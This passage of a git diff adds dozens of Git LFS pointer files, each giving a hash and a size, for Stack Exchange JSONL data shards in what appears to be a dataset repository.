sha256:8aa055791b743ee20185b7d90dccfb35bb87c29b0352e973cc286a1b8313640f +size 37725111 diff --git a/data/stackexchange/1-1/1968_2289.jsonl b/data/stackexchange/1-1/1968_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..140d446c2579cdc41d815285cc7585d1dc64e8e8 --- /dev/null +++ b/data/stackexchange/1-1/1968_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:476b538b1b0dfa77f8da5748f8f6b62093c30e09dc90e832ceb6217f51877046 +size 37898857 diff --git a/data/stackexchange/1-1/1969_2289.jsonl b/data/stackexchange/1-1/1969_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5decb5876c948393dd4cb618ea73fee7dfeca312 --- /dev/null +++ b/data/stackexchange/1-1/1969_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe5bb5d92aad17d9493ba740eddd1f7a0fa1b3b2182284dc5fcc9754637a93b9 +size 38158918 diff --git a/data/stackexchange/1-1/196_2289.jsonl b/data/stackexchange/1-1/196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0f4747c3759e5006412206a3e73f82f2d1686e4 --- /dev/null +++ b/data/stackexchange/1-1/196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c80122b6dea4f3fe903b7d4813b975191f25521627da116668ace9df8363ef36 +size 35543630 diff --git a/data/stackexchange/1-1/1970_2289.jsonl b/data/stackexchange/1-1/1970_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f65eaa584d8cda14a9e46e65128a01f1f5e2795 --- /dev/null +++ b/data/stackexchange/1-1/1970_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bba6ae5b1774126a2de2b62e66e7d65b8415157426540d28360b3fc6399cd21c +size 38042921 diff --git a/data/stackexchange/1-1/1971_2289.jsonl b/data/stackexchange/1-1/1971_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1cd6a2a1f86a75d2f9100991f131aa84f967099 --- /dev/null +++ b/data/stackexchange/1-1/1971_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0bb81d0d68cc170195916d3d586d940230073be71a68bc6d670d6c6891e9927 +size 37154815 diff --git a/data/stackexchange/1-1/1972_2289.jsonl b/data/stackexchange/1-1/1972_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f7c9fdc6b770b1f8350d47a9e8153f3a02f5d7cb --- /dev/null +++ b/data/stackexchange/1-1/1972_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3b47f8e7014f476fba608cf4fe6b1ada8363060a13b6634914fbf38b444d739 +size 38085128 diff --git a/data/stackexchange/1-1/1973_2289.jsonl b/data/stackexchange/1-1/1973_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60929a4dd7f652e16afa82d4f52e67d91f94ffff --- /dev/null +++ b/data/stackexchange/1-1/1973_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7492430815e6dcb4cebf6ef3d6f7cfc5a911cc11009fdf4976cd26d81c3cfc7 +size 38031588 diff --git a/data/stackexchange/1-1/1974_2289.jsonl b/data/stackexchange/1-1/1974_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c96b19026c054ae25bb472608309aba780fdd40 --- /dev/null +++ b/data/stackexchange/1-1/1974_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f731d4d8dd5357e75cb19e00389b5619246cb596e9a648ddb864d27c1632b589 +size 38002041 diff --git a/data/stackexchange/1-1/1975_2289.jsonl b/data/stackexchange/1-1/1975_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3fc2eab1bca6c266f5f0d2ffceb26c32bad15867 --- /dev/null +++ b/data/stackexchange/1-1/1975_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73461cdb501d5a5d18cc13a7804482131fe16b01571892d7fff141692d5a9c79 +size 38690455 diff --git a/data/stackexchange/1-1/1976_2289.jsonl b/data/stackexchange/1-1/1976_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62d6050a4f4c957c4a74febfa5f57e8edc1d73b0 --- /dev/null +++ b/data/stackexchange/1-1/1976_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35da1d3a7c109c291a498cd09709756cf1a624fbb6bb13d763f117e56abf4362 +size 38219229 diff --git a/data/stackexchange/1-1/1977_2289.jsonl b/data/stackexchange/1-1/1977_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32744cfb75327b85b5608349b9f3f8c70e7938f7 --- /dev/null +++ b/data/stackexchange/1-1/1977_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec07f5ba64cc1e8367b2718b9bc41df1c801d0495b8149d57b72e9436185031a +size 37935390 diff --git a/data/stackexchange/1-1/1978_2289.jsonl b/data/stackexchange/1-1/1978_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..848d8810b5b83c221a540eecdcd7be61dc683401 --- /dev/null +++ b/data/stackexchange/1-1/1978_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca8b3dae681b350c6209bc348808764feb41f9112d2ec24171c5d6eceabdcbd6 +size 37795926 diff --git a/data/stackexchange/1-1/1979_2289.jsonl b/data/stackexchange/1-1/1979_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..430fde51b55e93a0061f99cf8564dba6db356014 --- /dev/null +++ b/data/stackexchange/1-1/1979_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2df49bf473b5c3a4e02b807c8d5bf25dcbc4b95f9284e1851ba13d3e8f69a5 +size 38226926 diff --git a/data/stackexchange/1-1/197_2289.jsonl b/data/stackexchange/1-1/197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47a984a4300f93c1f4df513fac41e742986cb19f --- /dev/null +++ b/data/stackexchange/1-1/197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a60bcd60f0f34def2b9c75c6d3439c56871afc5b9157e7be1602d1c8aff505a +size 34917411 diff --git a/data/stackexchange/1-1/1980_2289.jsonl b/data/stackexchange/1-1/1980_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c64bfdd4d1c1e13dff4c7be02e3687764905b723 --- /dev/null +++ b/data/stackexchange/1-1/1980_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c95e92337d40779e653be5688fe255934da95d2c04aafb55bc13038d88ca01a +size 38629662 diff --git a/data/stackexchange/1-1/1981_2289.jsonl b/data/stackexchange/1-1/1981_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d15796e4577f2f5b375332704afc75f7fff1130 --- /dev/null +++ b/data/stackexchange/1-1/1981_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7bc0fe4fd92e0c76a8b51e5a0d70df45d3d2ba92a9e85f7b723cbc59e3d9ff3 +size 38222690 diff --git a/data/stackexchange/1-1/1982_2289.jsonl b/data/stackexchange/1-1/1982_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39d8bda99501e5555427b555458308211cd0a7ed --- /dev/null +++ b/data/stackexchange/1-1/1982_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63eff2aac3c987f74af0d1da3bdb2cb5e0d6b4de777afda4f4469b2f271ad88b +size 37840634 diff --git a/data/stackexchange/1-1/1983_2289.jsonl b/data/stackexchange/1-1/1983_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98a37765d5828ef20775a420dcc99d6da850ad1d --- /dev/null +++ b/data/stackexchange/1-1/1983_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e275f2e0b1294d4eb01a286ddbe15e3884e17ec9345ead76557b13f8be03c56 +size 37565472 diff --git a/data/stackexchange/1-1/1984_2289.jsonl b/data/stackexchange/1-1/1984_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dff0e88542af8cb1138b130005bbe0f87e99a7bc --- /dev/null +++ b/data/stackexchange/1-1/1984_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31a9823debdf4734808fce4112457417b3700c98109255f5a18abed026e92b59 +size 38274329 diff --git a/data/stackexchange/1-1/1985_2289.jsonl b/data/stackexchange/1-1/1985_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f489aac43541a9c3cd92d8644015b06424eb42b9 --- /dev/null +++ b/data/stackexchange/1-1/1985_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:016d612f18b0239b8db2cab84a4c1f0d431998aa97765c9d9d188dd159ebb711 +size 37247879 diff --git a/data/stackexchange/1-1/1986_2289.jsonl b/data/stackexchange/1-1/1986_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..889a7faaae24a851edbb96bd459c8b9df50f71fa --- /dev/null +++ b/data/stackexchange/1-1/1986_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9932b4d34693de9590b6407add49e0da11507e38f27a7ed585110ec2e60afdca +size 38192858 diff --git a/data/stackexchange/1-1/1987_2289.jsonl b/data/stackexchange/1-1/1987_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6e32ad2d4409013af8cba75876d999153e15c6e --- /dev/null +++ b/data/stackexchange/1-1/1987_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de15bcd152dd00bbac41f4f17669107eb918dc840403c8b3d07fe234c69b8cbd +size 38066212 diff --git a/data/stackexchange/1-1/1988_2289.jsonl b/data/stackexchange/1-1/1988_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aab212d5f60b98971ef6e235c9d0ae999bc96788 --- /dev/null +++ b/data/stackexchange/1-1/1988_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e506a3b3f6c545d62937ba2d491a972e3ab362ab9f3a4c4554fdd2ed4a3f28b +size 37807735 diff --git a/data/stackexchange/1-1/1989_2289.jsonl b/data/stackexchange/1-1/1989_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d191481a32b12dbbb06062a04786391f3b12fdcb --- /dev/null +++ b/data/stackexchange/1-1/1989_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8646bb4f12bd9f34d8a69de2dc6dc4ea4a0413ef3a883115d4ae17818f7b264d +size 40421282 diff --git a/data/stackexchange/1-1/198_2289.jsonl b/data/stackexchange/1-1/198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f5e8ce98b82f15c56fe018d1d064e4fc2e951e4 --- /dev/null +++ b/data/stackexchange/1-1/198_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8142b7efb0dfea36c39db8b1881ebd2cdac54758bd59ce57229c88b836c13d0a +size 35310316 diff --git a/data/stackexchange/1-1/1990_2289.jsonl b/data/stackexchange/1-1/1990_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ccad9f5af7048be6215144e71b6cacfaf82f0b0 --- /dev/null +++ b/data/stackexchange/1-1/1990_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dd62c6fe31b6ab9bd06cae1735c0546ade3f404e34d760b023f4208f6d8139b +size 40141571 diff --git a/data/stackexchange/1-1/1991_2289.jsonl b/data/stackexchange/1-1/1991_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2b2d3b4870bc3de496a98cdd63dbc5635683249 --- /dev/null +++ b/data/stackexchange/1-1/1991_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8503271933c2aca86ee7b21414e0a4a8c8b8070081947b8eef0658c322cbd10c +size 41418021 diff --git a/data/stackexchange/1-1/1992_2289.jsonl b/data/stackexchange/1-1/1992_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7620ec77a9d80ad58cb54705a80cd13088499109 --- /dev/null +++ b/data/stackexchange/1-1/1992_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75c3afe3e0415f96c10d64c6ae454668b30cfa97e6b5069d69284a879f2d457e +size 39949968 diff --git a/data/stackexchange/1-1/1993_2289.jsonl b/data/stackexchange/1-1/1993_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4e15081b664cf244459c88dca6c4833d4376c56 --- /dev/null +++ b/data/stackexchange/1-1/1993_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c81766a0bb3c19bd53230a75228f68a5c3e1ec18468263e36e0c6e7c3c5ae490 +size 48585347 diff --git a/data/stackexchange/1-1/1994_2289.jsonl b/data/stackexchange/1-1/1994_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61dfd4db0f568209f5e09d299460cfee9db460f5 --- /dev/null +++ b/data/stackexchange/1-1/1994_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb877cde805046421298e1e3f3f85b52b150c41e598ea94280b19c430d5c3290 +size 39940924 diff --git a/data/stackexchange/1-1/1995_2289.jsonl b/data/stackexchange/1-1/1995_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b494394aafc452baf3b6b36f702ec951f5bc121 --- /dev/null +++ b/data/stackexchange/1-1/1995_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5507d7c45ce9380115cebe21cc88f381e1de23416f3ccc6f9b61de80b2b4133 +size 41136355 diff --git a/data/stackexchange/1-1/1996_2289.jsonl b/data/stackexchange/1-1/1996_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8255915a1aa8b78639ee0c2a29be66b3bc4385e --- /dev/null +++ b/data/stackexchange/1-1/1996_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03377b729ac74fc6dc8c6c7c0b95c6284562a0f7860379a9c5744f65794c8287 +size 39807456 diff --git a/data/stackexchange/1-1/1997_2289.jsonl b/data/stackexchange/1-1/1997_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f533f758ce1dcc17b966d211c6c57f5a5bcbf1c7 --- /dev/null +++ b/data/stackexchange/1-1/1997_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53ea62bf9e4b63669350cccad22b4a97288d5d98dd22194474ca46a5d6afa0e1 +size 41113981 diff --git a/data/stackexchange/1-1/1998_2289.jsonl b/data/stackexchange/1-1/1998_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b684de4b3aee89d8b37aad9d4af69bbb6699fbf --- /dev/null +++ b/data/stackexchange/1-1/1998_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19890e58eeeb79d5f17341eb4685bb96d7108173b79c7508ea93ac71d5d35ae3 +size 40005952 diff --git a/data/stackexchange/1-1/1999_2289.jsonl b/data/stackexchange/1-1/1999_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec7d7e86753d784b96f6013c7b5d2d88a3fb364a --- /dev/null +++ b/data/stackexchange/1-1/1999_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ffe495c9a770f0a9003c33d65acae4c295b9cf964f889e7f013709409e8ee64 +size 41932231 diff --git a/data/stackexchange/1-1/199_2289.jsonl b/data/stackexchange/1-1/199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df9129e78967df04b654c002bd5fdcc39a1dea89 --- /dev/null +++ b/data/stackexchange/1-1/199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe9209364fc540be901433185f373c4d5b17881df78439a119519efd30f4d398 +size 34685531 diff --git a/data/stackexchange/1-1/19_2289.jsonl b/data/stackexchange/1-1/19_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e8d6ed04076914ef01bceada6305191679f8f25 --- /dev/null +++ b/data/stackexchange/1-1/19_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a076fee50cb77ac614d5c7a68e24984527e4bd1688012bf729a5e4a2e3828cf +size 35194489 diff --git a/data/stackexchange/1-1/1_2289.jsonl b/data/stackexchange/1-1/1_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a70661c8068eb304b7767c82d01e427b52fd6bea --- /dev/null +++ b/data/stackexchange/1-1/1_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e64872aab9b54aa7bbc20abf2e12646d238960e45ae67102ad0dae64017d12d2 +size 35410999 diff --git a/data/stackexchange/1-1/2000_2289.jsonl b/data/stackexchange/1-1/2000_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b7f008e4388bb2239d962e7bddfc131fbfce934 --- /dev/null +++ b/data/stackexchange/1-1/2000_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19aaa1efdab3832d9ad0e188bc98a43f0022b3c73df987d4d3808b16f0d2029b +size 39730689 diff --git a/data/stackexchange/1-1/2001_2289.jsonl b/data/stackexchange/1-1/2001_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..744a765235960734dcb670e18bf90968f8e5307c --- /dev/null +++ b/data/stackexchange/1-1/2001_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0bbeb35f9905bc0633d88284f68795253cb17a5be24c55d28a0a4b7c38f085d +size 40202927 diff --git a/data/stackexchange/1-1/2002_2289.jsonl b/data/stackexchange/1-1/2002_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..074aed5faae44f822e9ca2844a92b0c3849a2c22 --- /dev/null +++ b/data/stackexchange/1-1/2002_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b0bb58fcfa32e499cb56c3a06a4b923ff7493cda7c3272bb72fabe28f7fd7bc +size 40020587 diff --git a/data/stackexchange/1-1/2003_2289.jsonl b/data/stackexchange/1-1/2003_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1d7ffad0e76a2e2c07f572f23dcb44672a73cd9 --- /dev/null +++ b/data/stackexchange/1-1/2003_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba96d8422b73b937f14305827e42d1d642bc12f4a1140d790d2db3d323c83448 +size 41065357 diff --git a/data/stackexchange/1-1/2004_2289.jsonl b/data/stackexchange/1-1/2004_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0ce863c0e06b558f9cae2678ee10c556f386ec6 --- /dev/null +++ b/data/stackexchange/1-1/2004_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24c47f1c2842147c88fa2911b0d3f51fbce3fbbd2c964828fbd22241ce934930 +size 41228349 diff --git a/data/stackexchange/1-1/2005_2289.jsonl b/data/stackexchange/1-1/2005_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69a656cfb294f8740378972e8d0c63e0161ec3ba --- /dev/null +++ b/data/stackexchange/1-1/2005_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f06a3e0496d2a07fadd8f894663349757c646fe9e98e934798996e4aa09a20df +size 39521646 diff --git a/data/stackexchange/1-1/2006_2289.jsonl b/data/stackexchange/1-1/2006_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1700f8261624d56f029e2244a2df531d1a86dcc --- /dev/null +++ b/data/stackexchange/1-1/2006_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa97d7ccdb69ec37a2d6ce582218a233bfce791f302ddc8a99bb2dd8a93dad57 +size 40485125 diff --git a/data/stackexchange/1-1/2007_2289.jsonl b/data/stackexchange/1-1/2007_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c536829b9faaf4cf282699095c9b30448b08f12d --- /dev/null +++ b/data/stackexchange/1-1/2007_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7cca755b1e3383c4f2141ca97a30b213f3eac254ede75a3a4fd32388bd7f49 +size 40542566 diff --git a/data/stackexchange/1-1/2008_2289.jsonl b/data/stackexchange/1-1/2008_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01c68cbf10a9ef4b1c603fc81c2bf4d3615cfdf5 --- /dev/null +++ b/data/stackexchange/1-1/2008_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9d5615544d648270887f987509f0a484ab1aade0937b768e868f4471f0cbf8f +size 38705310 diff --git a/data/stackexchange/1-1/2009_2289.jsonl b/data/stackexchange/1-1/2009_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..113d1e66ee0cef990b765331049371cc48342190 --- /dev/null +++ b/data/stackexchange/1-1/2009_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:932ebe637f81663d4cb4e59eb4ec2b3a1832a5fe863132a4d5c8d082388f301b +size 39824436 diff --git a/data/stackexchange/1-1/200_2289.jsonl b/data/stackexchange/1-1/200_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8822ca9ee6f1ac44dfc2354b8e5c01da330c21d5 --- /dev/null +++ b/data/stackexchange/1-1/200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d6aa82c21810fb00665809205b1965d9f3bc4bc291e03f5466f4ac588aa0709 +size 37946954 diff --git a/data/stackexchange/1-1/2010_2289.jsonl b/data/stackexchange/1-1/2010_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1727df09dfca02cbb9773cf5c0adbcded37e4f73 --- /dev/null +++ b/data/stackexchange/1-1/2010_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a967e2791146535a98b0284b25cf9aed921af163f4c70da64d2b566b501c70 +size 40556997 diff --git a/data/stackexchange/1-1/2011_2289.jsonl b/data/stackexchange/1-1/2011_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ef801301ba3aabaaca05d9c5edd31fa6f73bd35 --- /dev/null +++ b/data/stackexchange/1-1/2011_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:321aca673a1389b7e48cd5ed1b6d6e0dd3b4a3366178eab440c79559867e5e88 +size 39339244 diff --git a/data/stackexchange/1-1/2012_2289.jsonl b/data/stackexchange/1-1/2012_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f17f766580225d7ca885175f7cd1d441b8b6f63 --- /dev/null +++ b/data/stackexchange/1-1/2012_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83dce5e6924adc80eee2db52b745a3b13cfdd8f2346e09aca85c54312c84ccc3 +size 39464309 diff --git a/data/stackexchange/1-1/2013_2289.jsonl b/data/stackexchange/1-1/2013_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45d607118745304948adc534efbc4ca1ca45744f --- /dev/null +++ b/data/stackexchange/1-1/2013_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729e61849fa181306ec3449b6f7443a06358ebaaeacf4792d17727c331efeaf1 +size 40194295 diff --git a/data/stackexchange/1-1/2014_2289.jsonl b/data/stackexchange/1-1/2014_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb488c8213264e7e8409b9100963561a9d96504e --- /dev/null +++ b/data/stackexchange/1-1/2014_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c9a2396041a3d51f9af2c2b6b0403f6127cb1aa61ada4458d07dee736707669 +size 42276242 diff --git a/data/stackexchange/1-1/2015_2289.jsonl b/data/stackexchange/1-1/2015_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2397e934b1064fdb53c132fb5cba5ee4de18101d --- /dev/null +++ b/data/stackexchange/1-1/2015_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e53d54132e650b73d75571f72631578075b991bc014ac30408fc0df64c6e9c2a +size 40448715 diff --git a/data/stackexchange/1-1/2016_2289.jsonl b/data/stackexchange/1-1/2016_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4681b181f9208d518e537a706421a00b062c845 --- /dev/null +++ b/data/stackexchange/1-1/2016_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da5f324c8af0434bb2ce8127f68b03f1c1814e14da77d21d464ea90555b4159d +size 40639481 diff --git a/data/stackexchange/1-1/2017_2289.jsonl b/data/stackexchange/1-1/2017_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd772f1183e45f31791a195e86d7a608205084c0 --- /dev/null +++ b/data/stackexchange/1-1/2017_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eef1de15ec100a9bbb1cf5025b9be5e5242fb979080e3227a5e37f0aa93653d +size 39027003 diff --git a/data/stackexchange/1-1/2018_2289.jsonl b/data/stackexchange/1-1/2018_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2bd4368ccae42828a3fd4edc8a1ee75a4657a1b --- /dev/null +++ b/data/stackexchange/1-1/2018_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfcd8f75630108f0d09a78818321aed0c86f099e1453a9c602121d9adb6f3cf7 +size 40503930 diff --git a/data/stackexchange/1-1/2019_2289.jsonl b/data/stackexchange/1-1/2019_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cffa6a69363ae9d0b7995d260934813ee138fb9d --- /dev/null +++ b/data/stackexchange/1-1/2019_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5182b8aad4442ff123de0fe4d5d4b844ab975f4cd0539f95e4b20db542082619 +size 40504944 diff --git a/data/stackexchange/1-1/201_2289.jsonl b/data/stackexchange/1-1/201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74905af701e3c9952883088fe4ce305194c94bbd --- /dev/null +++ b/data/stackexchange/1-1/201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23f5084d56c7545df3c363d31a7760c21c9668cb599ccd1b352ae82e6998201a +size 38090839 diff --git a/data/stackexchange/1-1/2020_2289.jsonl b/data/stackexchange/1-1/2020_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5cdf35a08da1417d657edeefe6cfa110e99f8400 --- /dev/null +++ b/data/stackexchange/1-1/2020_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e6046119538f8b1bd3068f78755fefa81ffeaf0c5495e1c815a46f675d47f8 +size 40667410 diff --git a/data/stackexchange/1-1/2021_2289.jsonl b/data/stackexchange/1-1/2021_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2f3834139c8505695332f0d101615ccccc40546 --- /dev/null +++ b/data/stackexchange/1-1/2021_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90e61194e408ff0662002fcc5ac1d80c443fa7653970ebf18903ed322c394d9d +size 40240099 diff --git a/data/stackexchange/1-1/2022_2289.jsonl b/data/stackexchange/1-1/2022_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1275e5c745d31f04470e1f968558ce93b9016108 --- /dev/null +++ b/data/stackexchange/1-1/2022_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f91176b9260399787823675ae479867d8393546fffb1ee9c872d409268dc687 +size 39500616 diff --git a/data/stackexchange/1-1/2023_2289.jsonl b/data/stackexchange/1-1/2023_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89e87cc4ca3206a6eec51ae3eb17a1b8a6c69991 --- /dev/null +++ b/data/stackexchange/1-1/2023_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73e06de58856eaa5d68b8245b88bc4df4ff13452df8dccb281cc0293ab7c9bc1 +size 39890168 diff --git a/data/stackexchange/1-1/2024_2289.jsonl b/data/stackexchange/1-1/2024_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f180c41fab9f44b5897e892c4853647ea3e22464 --- /dev/null +++ b/data/stackexchange/1-1/2024_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86a6595d39d1536b98043fd0b0f0b11496dbfbc5c9cd291edeb91b8804065387 +size 42247304 diff --git 